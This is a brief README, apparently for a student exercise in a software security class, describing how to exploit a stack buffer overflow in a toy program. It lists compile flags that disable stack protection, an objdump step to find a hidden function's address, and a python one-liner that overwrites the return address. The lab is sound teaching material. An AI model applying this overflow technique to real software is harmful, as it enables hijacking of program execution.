# Buffer Overflow Example

A simple buffer overflow example done for my CS3210 Software Security class. We were tasked with exploiting a buffer overflow to run a function that was not called in main.

## How to exploit overflow
compule with: gcc -static isThisGood.c -fno-stack-protector -o isThisGood
Then use objdump -d isThisGood > output.txt
Search the output text for the address of sureEnoughIGodToTheBadFunction
`python -c 'print "a"*20+"\xEF\xCD\xAB"' | ./isThisGood` where ABCDEF is the address found in the objdump
